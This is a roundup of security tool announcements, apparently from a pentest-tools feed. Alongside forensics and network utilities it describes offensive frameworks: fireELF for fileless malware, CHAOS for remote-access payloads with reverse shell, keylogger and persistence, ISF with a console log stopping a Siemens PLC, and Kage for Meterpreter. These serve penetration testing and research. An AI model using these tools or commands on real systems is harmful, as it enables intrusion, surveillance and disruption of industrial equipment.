fireELF – Fileless Linux Malware Framework

fireELF is a opensource fileless linux malware framework thats crossplatform and allows users to easily create and manage payloads. By default is comes with ‘memfd_create’ which is a new way to run linux elf executables completely from memory, without having the binary touch the harddrive.FeaturesChoose and build payloads.Ability to minify payloads.Ability to shorten payloads by uploading the payload source to a pastebin, it then creates a very small stager compatible with python <= 2.7 which allows for easy deployment.Output created payload to file.Ability to create payload from either a url or a local binary.Included payload memfd_createThe only included payload 'memfd_create' is based on the research of Stuart, this payload creates an anonymous file descriptor in memory it then uses fexecve to execute the binary directly from the file descriptor. This allows for the execution completely in memory which means that if the linux system gets restarted, the payload will be no where to be found.Creating a PayloadBy default fireELF comes with 'memfd_create' but users can develop their own payloads. By default the payloads are stored in payloads/ and in order to create a valid payload you simply need to include a dictonary named 'desc' with the parameters 'name', 'description', 'archs', and 'python_vers'. An example desc dictonary is below:desc = {"name" : "test payload", "description" : "new memory injection or fileless elf payload", "archs" : "all", "python_vers" : ">2.5"}In addition to the ‘desc’ dictonary the entry point the plugin engine i built uses requires a main function which will automatically get passed two parameters, one is a boolean that if its true it means its getting passed a url the second parameter it gets passed is the data. An example of a simple entry point is below:def main(is_url, url_or_payload): returnIf you have a method feel free to commit a payload!ScreenshotsInstallationDownload the dependencies by running:pip3 -U -r dep.txtfireELF is developed in Python 3.x.xUsageusage: main.py [-h] [-s] [-p PAYLOAD_NAME] [-w PAYLOAD_FILENAME] (-u PAYLOAD_URL | -e EXECUTABLE_PATH)fireELF, Linux Fileless Malware Generatoroptional arguments: -h, –help show this help message and exit -s Supress Banner -p PAYLOAD_NAME Name of Payload to Use -w PAYLOAD_FILENAME Name of File to Write Payload to (Highly Recommended if You’re not Using the Paste Site Option) -u PAYLOAD_URL Url of Payload to be Executed -e EXECUTABLE_PATH Location of ExecutableDownload fireELF

Link: http://feedproxy.google.com/~r/PentestTools/~3/nkiWxHsqM50/fireelf-fileless-linux-malware-framework.html

FLASHMINGO – Automatic Analysis Of SWF Files Based On Some Heuristics

Automatic Analysis Of SWF Files Based On Some Heuristics. Extensible Via Plugins.InstallInstall the Python (2.7) packages listed in requirements.txt.You can use the following command: pip install -r requirements.txtIf you want to use the decompilation functionality you need to install Jython. Ubuntu/Debian users can issue apt install jythonClone the project or download the zip file.WhatFLASHMINGO is an analysis framework for SWF files. The tool automatically triages suspicious Flash files and guides the further analysis process, freeing precious resources in your team. You can easily incorporate FLASHMINGO’s analysis modules into your workflow.WhyTo this day forensic investigators and malware analysts must deal with suspicious SWF files. If history repeats itself the security threat may even become bigger beyond Flash’s end of life in 2020. Systems will continue to support a legacy file format that is not going to be updated with security patches anymore. Automation is the best way to deal with this issue and this is where FLASHMINGO can help you. FLASHMINGO is an analysis framework to automatically process SWF files that enables you to flag suspicious Flash samples and analyze them with minimal effort. It integrates into various analysis workflows as a stand-alone application or a powerful library. Users can easily extend the tool’ s functionality via custom Python plugins.HowArchitectureFLASHMINGO is designed with simplicity in mind. It reads a SWF file and creates an object (SWFObject) representing its contents and structure. Afterwards FLASHMINGO runs a series of plugins acting on this SWFObject and returning their values to the main program.Below a mandatory ASCII art flow diagram: +———-+ | | +————+———–>+ PLUGIN 1 +————+ | | | | | | | +———-+ | | | | | | +———-+ | | | | | |+———+ | +———–>+ PLUGIN 2 +——–+ ||SWF FILE +———–>+ FLASHMINGO | | | | |+———+ | | +———-+ | | | | | | | | | | | | | | | | +—–v—v-+ | | | | | | | | +—–+——+————————->+ SWFOBJECT | ^ | | | | | | +—–+—–+ | | | | | | +—————————————+When using FLASHMINGO as a library in your own projects, you only need to take care of two kind of objects:one or many SWFObject(s), representing the sample(s)a Flashmingo object. This acts essentially as a harness connecting plugins and SWFObject(s).Plugins!FLASHMINGO plugins are stored in their own directories under… you guessed it: plugins When a Flashmingo object is instantiated, it goes through this directory and process all plugins’ manifests. Should this indicate that the plugin is active, this is registered for later use. At the code level, this means that a small plugin_info dictionary is added to the plugins list.Plugins are invoked via the run_plugin API with two arguments:the plugin’s namethe SWFObject instanceOptionally, most of the plugins allow you to pass your own user data. This is plugin dependent (read the documentation) and it can be more easily be explained with an example. The default plugin SuspiciousNames will search all constant pools for strings containing suspicious substrings (for example: ‘overflow’, ‘spray’, ‘shell’, etc.) There is a list of common substrings already hard-coded in the plugin so that it can be used as-is. However, you may pass a list of your own defined substrings, in this case via the names parameter.Code example:fm = Flashmingo()print fm.run_plugin(‘DangerousAPIs’, swf=swf)print fm.run_plugin(‘SuspiciousNames’, swf=swf, names=[‘spooky’])Default pluginsFLASHMINGO ships with some useful plugins out of the box:binary_datadangerous_apisdecompilersuspicious_constantssuspicious_loopssuspicious_namestemplate :)Extending FLASHMINGOA template plugin is provided for easy development. Extending FLASHMINGO is rather straightforward. Follow these simple steps:Copy the templateEdit the manifestOverride the run methodAdd your custom codeYou are ready to go :)FLASHMINGO as a libraryAPISee the docs directory for autogenerated documentationSee FireEye’s blog post for an exampleFront-endsConsoleCreate Documentation$ pip install sphinxcontrib-napoleonAfter setting up Sphinx to build your docs, enable napoleon in the Sphinx conf.py file:In conf.py, add napoleon to the extensions listextensions = [‘sphinxcontrib.napoleon’]Use sphinx-apidoc to build your API documentation:$ sphinx-apidoc -f -o docs/source projectdirThis creates .rst files for Sphinx to process$ make htmlThat’s it! :)Download Flashmingo

Link: http://feedproxy.google.com/~r/PentestTools/~3/ACw-482_MOc/flashmingo-automatic-analysis-of-swf.html

ISF – Industrial Control System Exploitation Framework

ISF(Industrial Exploitation Framework) is a exploitation framework based on Python, it’s similar to metasploit framework.ISF is based on open source project routersploit.Read this in other languages: English, 简体中文,ICS Protocol Clients Name Path Description modbus_tcp_client icssploit/clients/modbus_tcp_client.py Modbus-TCP Client wdb2_client icssploit/clients/wdb2_client.py WdbRPC Version 2 Client(Vxworks 6.x) s7_client icssploit/clients/s7_client.py s7comm Client(S7 300/400 PLC) Exploit Module Name Path Description s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control.py S7-300/400 PLC start/stop s7_1200_plc_control exploits/plcs/siemens/s7_1200_plc_control.py S7-1200 PLC start/stop/reset vxworks_rpc_dos exploits/plcs/vxworks/vxworks_rpc_dos.py Vxworks RPC remote dos(CVE-2015-7599) quantum_140_plc_control exploits/plcs/schneider/quantum_140_plc_control.py Schneider Quantum 140 series PLC start/stop crash_qnx_inetd_tcp_service exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py QNX Inetd TCP service dos qconn_remote_exec exploits/plcs/qnx/qconn_remote_exec.py QNX qconn remote code execution profinet_set_ip exploits/plcs/siemens/profinet_set_ip.py Profinet DCP device IP config Scanner Module Name Path Description profinet_dcp_scan scanners/profinet_dcp_scan.py Profinet DCP scanner vxworks_6_scan scanners/vxworks_6_scan.py Vxworks 6.x scanner s7comm_scan scanners/s7comm_scan.py S7comm scanner enip_scan scanners/enip_scan.py EthernetIP scanner ICS Protocols Module (Scapy Module)These protocol can used in other Fuzzing framework like Kitty or create your own client. Name Path Description pn_dcp icssploit/protocols/pn_dcp Profinet DCP Protocol modbus_tcp icssploit/protocols/modbus_tcp Modbus TCP Protocol wdbrpc2 icssploit/protocols/wdbrpc2 WDB RPC Version 2 Protocol s7comm icssploit/protocols/s7comm.py S7comm Protocol InstallPython requirementsgnureadline (OSX only)requestsparamikobeautifulsoup4pysnmppython-nmapscapy We suggest install scapy manual with this official documentInstall on Kaligit clone https://github.com/dark-lbp/isf/cd isfpython isf.pyUsage root@kali:~/Desktop/temp/isf# python isf.py _____ _____ _____ _____ _____ _ ____ _____ _______ |_ _/ ____|/ ____/ ____| __ \| | / __ \_ _|__ __| | || | | (___| (___ | |__) | | | | | || | | | | || | \___ \\___ \| ___/| | | | | || | | | _| || |____ ____) |___) | | | |___| |__| || |_ | | |_____\_____|_____/_____/|_| |______\____/_____| |_| ICS Exploitation Framework Note : ICSSPOLIT is fork from routersploit at https://github.com/reverse-shell/routersploit Dev Team : wenzhe zhu(dark-lbp) Version : 0.1.0 Exploits: 2 Scanners: 0 Creds: 13 ICS Exploits: PLC: 2 ICS Switch: 0 Software: 0 isf >Exploitsisf > use exploits/plcs/exploits/plcs/siemens/ exploits/plcs/vxworks/isf > use exploits/plcs/siemens/s7_300_400_plc_controlexploits/plcs/siemens/s7_300_400_plc_controlisf > use exploits/plcs/siemens/s7_300_400_plc_controlisf (S7-300/400 PLC Control) >You can use the tab key for completion.OptionsDisplay module options:isf (S7-300/400 PLC Control) > show optionsTarget options: Name Current settings Description —- —————- ———– target Target address e.g. 192.168.1.1 port 102 Target PortModule options: Name Current settings Description —- —————- ———– slot 2 CPU slot number. command 1 Command 0:start plc, 1:stop plc.isf (S7-300/400 PLC Control) >Set optionsisf (S7-300/400 PLC Control) > set target 192.168.70.210[+] {‘target’: ‘192.168.70.210’}Run moduleisf (S7-300/400 PLC Control) > run[*] Running module…[+] Target is alive[*] Sending packet to target[*] Stop plcisf (S7-300/400 PLC Control) >Display information about exploitisf (S7-300/400 PLC Control) > show infoName:S7-300/400 PLC ControlDescription:Use S7comm command to start/stop plc.Devices:- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)Authors:- wenzhe zhu References:isf (S7-300/400 PLC Control) >DocumentsModbus-TCP Client usageWDBRPCV2 Client usageS7comm Client usageSNMP_bruteforce usageS7 300/400 PLC password bruteforce usageVxworks 6.x Scanner usageProfient DCP Scanner usageS7comm PLC Scanner usageProfinet DCP Set ip module usageLoad modules from extra folderHow to write your own moduleDownload ISF

Link: http://feedproxy.google.com/~r/PentestTools/~3/oT_vl-DqvbE/isf-industrial-control-system.html

Pocsuite3 – An Open-Sourced Remote Vulnerability Testing Framework

pocsuite3 is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the Knownsec 404 Team. It comes with a powerful proof-of-concept engine, many powerful features for the ultimate penetration testers and security researchers.FeaturesPoC scripts can running with attack,verify, shell mode in different wayPlugin ecosystemDynamic loading PoC script from any where (local file, redis , database, Seebug …)Load multi-target from any where (CIDR, local file, redis , database, Zoomeye, Shodan …)Results can be easily exportedDynamic patch and hook requestsBoth command line tool and python package import to useIPV6 supportGlobal HTTP/HTTPS/SOCKS proxy supportSimple spider API for PoC script to useIntegrate with Seebug (for load PoC from Seebug website)Integrate with ZoomEye (for load target from ZoomEye Dork)Integrate with Shodan (for load target from Shodan Dork)Integrate with Ceye (for verify blind DNS and HTTP request)Friendly debug PoC scripts with IDEsMore …Screenshotspocsuite3 console modepocsuite3 shell modepocsuite3 load PoC from Seebugpocsuite3 load multi-target from ZoomEyepocsuite3 load multi-target from ShodanRequirementsPython 3.4+Works on Linux, Windows, Mac OSX, BSDInstallationThe quick way:$ pip install pocsuite3Or click here to download the latest source zip package and extract$ wget https://github.com/knownsec/pocsuite3/archive/master.zip$ unzip master.zipThe latest version of this software is available from: http://pocsuite.orgDocumentationDocumentation is available in the english docs / chinese docs directory.Download Pocsuite3

Link: http://feedproxy.google.com/~r/PentestTools/~3/x6R6agm_yNE/pocsuite3-open-sourced-remote.html

CHAOS Framework v2.0 – Generate Payloads And Control Remote Windows Systems

CHAOS is a PoC that allow generate payloads and control remote operating systems.Features Feature Windows Mac Linux Reverse Shell X X X Download File X X X Upload File X X X Screenshot X X X Keylogger X Persistence X Open URL X X X Get OS Info X X X Fork Bomb X X X Run Hidden X Tested OnKali Linux – ROLLING EDITIONHow to Install# Install dependencies$ sudo apt install golang git -y# Get this repository$ go get github.com/tiagorlampert/CHAOS# Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)$ go get github.com/kbinani/screenshot$ go get github.com/lxn/win$ go get github.com/matishsiao/goInfo$ go get golang.org/x/sys/windows# Maybe you will see the message “package github.com/lxn/win: build constraints exclude all Go files".# It’s occurs because the libraries are to windows systems, but it necessary to build the payload.# Go into the repository$ cd ~/go/src/github.com/tiagorlampert/CHAOS# Run$ go run main.goHow to Use Command On HOST does… generate Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos –windows) lhost= Specify a ip for connection lport= Specify a port for connection fname= Specify a filename to output –windows Target Windows –macos Target Mac OS –linux Target Linux listen Listen for a new connection (e.g. listen lport=8080) serve Serve files exit Quit this program Command On TARGET does… download File Download upload File Upload screenshot Take a Screenshot keylogger_start Start Keylogger session keylogger_show Show Keylogger session logs persistence_enable Install at Startup persistence_disable Remove from Startup getos Get OS name lockscreen Lock the OS screen openurl Open the URL informed bomb Run Fork Bomb clear Clear the Screen back Close connection but keep running on target exit Close connection and exit on target VideoFAQWhy does Keylogger capture all uppercase letters?All the letters obtained using the keylogger are uppercase letters. It is a known issue, in case anyone knows how to fix the Keylogger function using golang, please contact me or open an issue.Why are necessary get and install external libraries?To implement the screenshot function i used a third-party library, you can check it in https://github.com/kbinani/screenshot and https://github.com/lxn/win. You must download and install it to generate the payload.Contacttiagorlampert@gmail.comDownload CHAOS

Link: http://www.kitploit.com/2019/04/chaos-framework-v20-generate-payloads.html

SMS-Stack – Framework to provided TPC/IP based characteristics to the GSM Short Message Service

Sms Stack is a Framework to provided TPC/IP based characteristics to the GSM Short Message Service.This framework works in multiple environments to provided a full stack integration in a service.The main layer features techniques to control the order and the number of sms for a given stream, and a layer of security with AES + CTR cypher.You can easily implement your own protocol on the top of the stack of Sms Stack and add new features to an Sms Based communication between devices.PrerequisitiesYou can download use sms-stack in multiple environments in order to implement it in multiple scenearios.TypescriptNpm – https://www.npmjs.comNodejs – https://nodejs.org/en/Typescript – https://www.typescriptlang.org/#download-linksPythonPython 3.4 or higher – https://www.python.org/downloads/Pip – https://pypi.org/project/pip/AndroidAndroid API 23 (6.0) or higher – https://developer.android.com/about/versions/marshmallow/android-6.0Android Studio + Gradle (With JUnit) – https://developer.android.com/studio/installUsageSimply add the framework in one of each repositories given in your repository.Typescriptnpm install sms-stack 1.x.xPythonpip install sms stack 0.x.xAndroidAdd in the gradle app file implementation ‘com.example.smstcplibrary:smsstack:0.x.xFor further implementation, please use the given wikiSMS Stack schemeContactTHE SOFTWARE IS PROVIDED “AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.This software doesn’t have a QA Process. This software is a Proof of Concept.If you have any problems, you can contact:pablo@11paths.com – Ideas Locas CDO – Telefónicafranciscojose.ramirezvicente@telefonica.com – Ideas Locas CDO – Telefónicalucas.fernandezaragon@telefonica.com – Ideas Locas CDO – TelefónicaFor more information please visit https://www.elevenpaths.com.Download SDK-SMS-Stack

Link: http://feedproxy.google.com/~r/PentestTools/~3/9hceL_jtpCY/sms-stack-framework-to-provided-tpcip.html

Decker – Declarative Penetration Testing Orchestration Framework

Decker is a penetration testing orchestration framework. It leverages HashiCorp Configuration Language 2 (the same config language as Terraform) to allow declarative penetration testing as code, so your tests can be versioned, shared, reused, and collaborated on with your team or the community.Example of a decker config file:// variables are pulled from environment// ex: DECKER_TARGET_HOST// they will be available throughout the config files as var.*// ex: ${var.target_host}variable “target_host" { type = "string"}// resources refer to plugins// resources need unique names so plugins can be used more than once// they are declared with the form: ‘resource "plugin_name" "unique_name" {}’// their outputs will be available to others using the form unique_name.*// ex: nmap.443resource "nmap" "nmap" { host = "${var.target_host}" plugin_enabled = "true"}resource "sslscan" "sslscan" { host = "${var.target_host}" plugin_enabled = "${nmap.443 == "open"}"}Run a plugin for each item in a list:variable "target_host" { type = "string"}resource "nslookup" "nslookup" { dns_server = "8.8.4.4" host = "${var.target_host}"}resource "metasploit" "metasploit" { for_each = "${nslookup.ip_address}" exploit = "auxiliary/scanner/portscan/tcp" options = { RHOSTS = "${each.key}/32" INTERFACE = "eth0" }}Complex configuration combining for_each with nested values:variable "target_host" { type = "string"}resource "nslookup" "nslookup" { dns_server = "8.8.4.4" host = "${var.target_host}"}resource "nmap" "nmap" { for_each = "${nslookup.ip_address}" host = "${each.key}"}// for each IP, check if nmap found port 25 open.// if yes, run metasploit’s smtp_enum scannerresource "metasploit" "metasploit" { for_each = "${nslookup.ip_address}" exploit = "auxiliary/scanner/smtp/smtp_enum" options = { RHOSTS = "${each.key}" } plugin_enabled = "${nmap["${each.key}"].25 == "open"}"}Output formatsSeveral output formats are available and more than one can be selected at the same time.Setting DECKER_OUTPUTS_JSON or DECKER_OUTPUTS_XML to "true" will output json and xml formatted files respectively.Output .json files in addition to plain text: export DECKER_OUTPUTS_JSON="true"Output .xml files in addition to plain text: export DECKER_OUTPUTS_XML="true"Why the name decker?My friend Courtney came to the rescue when I was struggling to come up with a name and found decker in a SciFi word glossary… and it sounded cool.A future cracker; a software expert skilled at manipulating cyberspace, especially at circumventing security precautions.Running an example config with dockerTwo volumes are mounted:Directory named decker-reports where decker will output a file for each plugin executed. The file’s name will be {unique_resource_name}.report.txt.examples directory containing decker config files. Mounting this volume allows you to write configs locally using your favorite editor and still run them within the container.One environment variable is passed in:DECKER_TARGET_HOSTThis is referenced in the config files as {var.target_host}. Decker will loop through all environment variables named DECKER_*, stripping away the prefix and setting the rest to lowercase.docker run -it –rm \ -v "$(pwd)/decker-reports/":/tmp/reports/ \ -v "$(pwd)/examples/":/decker-config/ \ -e DECKER_TARGET_HOST=example.com \ stevenaldinger/decker:kali decker ./decker-config/example.hclWhen decker finishes running the config, look in ./decker-reports for the outputs.Running an example config without dockerYou’ll likely want to set the directory decker writes reports to with the DECKER_REPORTS_DIR environment variable.Something like this would be appropriate. Just make sure whatever you set it to is an existing directory.export DECKER_REPORTS_DIR="$HOME/decker-reports"You’ll also need to set a target host if you’re running one of the example config files.export DECKER_TARGET_HOST=""Then just run a config file. Change to the root directory of this repo and run:./decker ./examples/example.hclContributingContributions are very welcome and appreciated. See docs/contributions.md for guidelines.DevelopmentUsing docker for development is recommended for a smooth experience. This ensures all dependencies will be installed and ready to go.Refer to Directory Structure below for an overview of the go code.Quick Start(on host machine): make docker_build(on host machine): make docker_run (will start docker container and open an interactive bash session)(inside container): dep ensure -v(inside container): make build_all(inside container): make runInitialize git hooksRun make init to add a pre-commit script that will run linting and tests on each commit.Plugin DevelopmentDecker itself is just a framework that reads config files, determines dependencies in the config files, and runs plugins in an order that ensures plugins with dependencies on other plugins (output of one plugin being an input for another) run after the ones they depend on.The real power of decker comes from plugins. Developing a plugin can be as simple or as complex as you want it to be, as long as the end result is a .so file containing the compiled plugin code and a .hcl file in the same directory declaring the inputs the plugin is expecting a user to configure.The recommended way to get started with decker plugin development is by cloning the decker-plugin repository and following the steps in its documentation. It should only take you a few minutes to get a "Hello World" decker plugin running.Installing pluginsBy default, plugins are expected to be in a directory relative to wherever the decker binary is, at <decker binary>/internal/app/decker/plugins/<plugin name>/<plugin name>.so. Additional paths can be added by setting the DECKER_PLUGIN_DIRS environment variable. The default plugin path will still be used if DECKER_PLUGIN_DIRS is set.Example: export DECKER_PLUGIN_DIRS="/path/to/my/plugins:/additional/path/to/plugins"There should be an HCL file next to the .so file at <decker binary>/internal/app/decker/plugins/<plugin name>/<plugin name>.hcl that defines its inputs and outputs. Currently, only string, list, and map inputs are supported. Each input should have an input block that looks like this:input "my_input" { type = "string" default = "some default value"}Directory Structure.├── build│   ├── ci/│   └── package/├── cmd│   ├── decker│   │   └── main.go│   └── README.md├── deployments/├── docs/├── examples│   └── example.hcl├── githooks│   ├── pre-commit├── Gopkg.toml├── internal│   ├── app│   │   └── decker│   │   └── plugins│   │   ├── a2sv│   │   │   ├── a2sv.hcl│   │   │   ├── main.go│   │   │   └── README.md│   │   └── …│   │   ├── main.go│   │   ├── README.md│   │   └── xxx.hcl│   ├── pkg│   │   ├── dependencies/│   │   ├── gocty/│   │   ├── hcl/│   │   ├── paths/│   │   ├── plugins/│   │   └── reports/│   └── README.md├── LICENSE├── Makefile├── README.md└── scripts ├── build-plugins.sh └── README.mdcmd/decker/main.go is the driver. Its job is to parse a given config file, load the appropriate plugins based on the file’s resource blocks, and run the plugins with the specified inputs.examples has a couple example configurations to get you started with decker. If you use the kali docker image (stevenaldinger/decker:kali), all dependencies should be installed for all config files and things should run smoothly.internal/pkg is where most of the actual code is. It contains all the packages imported by main.go.dependencies is responsible for building the plugin dependency graph and returning a topologically sorted array that ensures plugins are run in a working order.gocty offers helpers for encoding and decoding go-cty values which are used to handle dynamic input types.hcl is responsible for parsing HCL files, including creating evaluation contexts that let blocks properly decode when they depend on other plugin blocks.paths is responsible for returning file paths for the decker binary, config files, plugin config files, and generated reports.plugins is responsible for determining if plugins are enabled and running them.reports is responsible for writing reports to the file system.internal/app/decker/plugins are modular pieces of code written as Golang plugins, implementing a simple interface that allows them to be loaded and called at run-time with inputs and outputs specified in the plugin’s config file (also in HCL). An example can be found at internal/app/decker/plugins/nslookup/nslookup.hcl.decker config files offer a declarative way to write penetration tests. The manifests are written in HashiCorp Configuration Language 2) and describe the set of plugins to be used in the test as well as their inputs.Download Decker

Link: http://feedproxy.google.com/~r/PentestTools/~3/v-JzhQO-i2Q/decker-declarative-penetration-testing.html

PFQ – Functional Network Framework For Multi-Core Architectures

PFQ is a functional framework designed for the Linux operating system built for efficient packets capture/transmission (10G, 40G and beyond), in-kernel functional processing, kernel-bypass and packets steering across groups of sockets/end-points.It is highly optimized for multi-core architecture, as well as for network devices equipped with multiple hardware queues. Compliant with any NIC, it provides a script that generates accelerated network device drivers starting from the source code.PFQ enables the development of high-performance network applications, and it is shipped with a custom version of libpcap that accelerate and parallelize legacy applications. Besides, a pure functional language designed for early stages in-kernel packet processing is included: pfq-lang.Pfq-Lang is inspired by Haskell and is intended to define applications that run on top of network device drivers. Through pfq-lang it is possible to build efficient bridges, port mirrors, simple firewalls, network balancers and so forth.The framework includes the source code of the PFQ kernel module, user-space libraries for C, C++11-14, Haskell language, an accelerated pcap library, an implementation of pfq-lang as eDSL for C++/Haskell, an experimental pfq-lang compiler and a set of diagnostic tools.FeaturesData-path with full lock-free architecture.Preallocated pools of socket buffers.Compliant with a plethora of network devices drivers.Rx and Tx line-rate on 10-Gbit links (14,8 Mpps), tested with Intel ixgbe vanilla drivers.Transparent support of kernel threads for asynchronous packets transmission.Transmission with active timestamping.Groups of sockets which enable concurrent monitoring of multiple multi-threaded applications.Per-group packet steering through randomized hashing or deterministic classification.Per-group Berkeley and VLAN filters.User-space libraries for C, C++11-14 and Haskell language.Functional engine for in-kernel packet processing with pfq-lang.pfq-lang eDLS for C++11-14 and Haskell language.pfq-lang compiler used to parse and compile pfq-lang programs.Accelerated pcap library for legacy applications (line-speed tested with captop).I/O user<->kernel memory-mapped communications allocated on top of HugePages.pfqd daemon used to configure and parallelize (pcap) legacy applications.pfq-omatic script that automatically accelerates vanilla drivers.Publications”PFQ: a Novel Engine for Multi-Gigabit Packet Capturing With Multi-Core Commodity Hardware": Best-Paper-Award at PAM2012, paper avaiable from here"A Purely Functional Approach to Packet Processing": ANCS 2014 Conference (October 2014, Marina del Rey)"Network Traffic Processing with PFQ": JSAC-SI-MT/IEEE journal Special Issue on Measuring and Troubleshooting the Internet (March 2016)"Enabling Packet Fan–Out in the libpcap Library for Parallel Traffic Processing": Network Traffic Measurement and Analysis Conference (TMA 2017)"A Pipeline Functional Language for Stateful Packet Processing": IEEE International Workshop on NEtwork Accelerated FunctIOns (NEAF-IO ’17)"The Acceleration of OfSoftSwitch": IEEE Conference on Network Function Virtualization and Software Defined Networks (NFV-SDN ’17)Invited talks"Functional Network Programming" at Tyrrhenian International Workshop on Digital Communication – (Sep. 2016)"Software Accelerations for Network Applications" at NetV IRISA / Technicolor Workshop on Network Virtualization (Feb. 2017)AuthorNicola Bonelli nicola@pfq.ioContributors (in chronological order)Andrea Di Pietro andrea.dipietro@for.unipi.itLoris Gazzarrini loris.gazzarrini@iet.unipi.itGregorio Procissi g.procissi@iet.unipi.itGiacomo Volpi volpi.gia@gmail.comLuca Abeni abeni@dit.unitn.itTolysz tolysz@gmail.comLSB leebutterman@gmail.comAndrey Korolyov andrey@xdel.ruMrClick valerio.click@gmx.comPaul Emmerich emmericp@net.in.tum.deBach Le bach@bullno1.comMarian Jancar jancar.marian@gmail.comnizq ni.zhiqiang@gmail.comGiuseppe Sucameli brush.tyler@gmail.comSergio Borghese s.borghese@netresults.itFabio Del Vigna fabio.delvigna@larthia.comHomePagesPFQ home-page is www.pfq.ioDownload PFQ

Link: http://feedproxy.google.com/~r/PentestTools/~3/lHrferXOPnc/pfq-functional-network-framework-for.html

Kage – Graphical User Interface For Metasploit Meterpreter And Session Handler

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.For now it only supports windows/meterpreter & android/meterpreterGetting StartedPlease follow these instructions to get a copy of Kage running on your local machine without any problems.PrerequisitesMetasploit-framework must be installed and in your PATH:MsfrpcdMsfvenomMsfdbInstallingYou can install Kage binaries from here.for developersto run the app from source code:# Download source codegit clone https://github.com/WayzDev/Kage.git# Install dependencies and run kagecd Kageyarn # or npm installyarn run dev # or npm run dev# to build projectyarn run buildelectron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.ScreenshotsVideo TutorialContactTwitter: @iFalahEmail: ifalah@protonmail.comCreditsMetasploit Framework – (c) Rapid7 Inc. 2012 (BSD License)http://www.metasploit.com/node-msfrpcd – (c) Tomas Gonzalez Vivo. 2017 (Apache License)https://github.com/tomasgvivo/node-msfrpcelectron-vue – (c) Greg Holguin. 2016 (MIT)https://github.com/SimulatedGREG/electron-vueThis project was generated with electron-vue@8fae476 using vue-cli. Documentation about the original structure can be found here.Download Kage

Link: http://feedproxy.google.com/~r/PentestTools/~3/tRooyJ9gO2o/kage-graphical-user-interface-for.html

Turbinia – Automation And Scaling Of Digital Forensics Tools

Turbinia is an open-source framework for deploying, managing, and running distributed forensic workloads. It is intended to automate running of common forensic processing tools (i.e. Plaso, TSK, strings, etc) to help with processing evidence in the Cloud, scaling the processing of large amounts of evidence, and decreasing response time by parallelizing processing where possible.How it worksTurbinia is composed of different components for the client, server and the workers. These components can be run in the Cloud, on local machines, or as a hybrid of both. The Turbinia client makes requests to process evidence to the Turbinia server. The Turbinia server creates logical jobs from these incoming user requests, which creates and schedules forensic processing tasks to be run by the workers. The evidence to be processed will be split up by the jobs when possible, and many tasks can be created in order to process the evidence in parallel. One or more workers run continuously to process tasks from the server. Any new evidence created or discovered by the tasks will be fed back into Turbinia for further processing.Communication from the client to the server is currently done with either Google Cloud PubSub or Kombu messaging. The worker implementation can use either PSQ (a Google Cloud PubSub Task Queue) or Celery for task scheduling.More information on Turbinia and how it works can be found here.StatusTurbinia is currently in Alpha release.InstallationThere is an rough installation guide here.UsageThe basic steps to get things running after the initial installation and configuration are:Start Turbinia server component with turbiniactl server commandStart one or more Turbinia workers with turbiniactl psqworkerSend evidence to be processed from the turbinia client with turbiniactl ${evidencetype}Check status of running tasks with turbiniactl statusturbiniactl can be used to start the different components, and here is the basic usage:$ turbiniactl –helpusage: turbiniactl [-h] [-q] [-v] [-d] [-a] [-f] [-o OUTPUT_DIR] [-L LOG_FILE] [-r REQUEST_ID] [-R] [-S] [-C] [-V] [-D] [-F FILTER_PATTERNS_FILE] [-j JOBS_WHITELIST] [-J JOBS_BLACKLIST] [-p POLL_INTERVAL] [-t TASK] [-w] …optional arguments: -h, –help show this help message and exit -q, –quiet Show minimal output -v, –verbose Show verbose output -d, –debug Show debug output -a, –all_fields Show all task status fields in output -f, –force_evidence Force evidence processing request in potentially unsafe conditions -o OUTPUT_DIR, –output_dir OUTPUT_DIR Directory path for output -L LOG_FILE, –log_file LOG_FILE Log file -r REQUEST_ID, –request_id REQUEST_ID Create new requests with this Request ID -R, –run_local Run completely locally without any server or other infrastructure. This can be used to run one-off Tasks to process data locally. -S, –server Run Turbinia Server indefinitely -C, –use_celery Pass this flag when using Celery/Kombu for task queuing and messaging (instead of Google PSQ/pubsub) -V, –version Show the version -D, –dump_json Dump JSON output of Turbinia Request instead of sending it -F FILTER_PATTERNS_FILE, –filter_patterns_file FILTER_PATTERNS_FILE A file containing newline separated string patterns to filter text based evidence files with (in extended grep regex format). This filtered output will be in addition to the complete output -j JOBS_WHITELIST, –jobs_whitelist JOBS_WHITELIST A whitelist for Jobs that we will allow to run (note that it will not force them to run). -J JOBS_BLACKLIST, –jobs_blacklist JOBS_BLACKLIST A blacklist for Jobs we will not allow to run -p POLL_INTERVAL, –poll_interval POLL_INTERVAL Number of seconds to wait between polling for task state info -t TASK, –task TASK The name of a single Task to run locally (must be used with –run_local. -w, –wait Wait to exit until all tasks for the given request have completedCommands: <command> rawdisk Process RawDisk as Evidence googleclouddisk Process Google Cloud Persistent Disk as Evidence googleclouddiskembedded Process Google Cloud Persistent Disk with an embedded raw disk image as Evidence directory Process a directory as Evidence listjobs List all available jobs psqworker Run PSQ worker celeryworker Run Celery worker status Get Turbinia Task status server Run Turbinia ServerThe commands for processing the evidence types of rawdisk and directory specify information about evidence that Turbinia should process. By default, when adding new evidence to be processed, turbiniactl will act as a client and send a request to the configured Turbinia server, otherwise if –server is specified, it will start up its own Turbinia server process. Here’s the turbiniactl usage for adding a raw disk type of evidence to be processed by Turbinia:$ ./turbiniactl rawdisk -husage: turbiniactl rawdisk [-h] -l LOCAL_PATH [-s SOURCE] [-n NAME]optional arguments: -h, –help show this help message and exit -l LOCAL_PATH, –local_path LOCAL_PATH Local path to the evidence -s SOURCE, –source SOURCE Description of the source of the evidence -n NAME, –name NAME 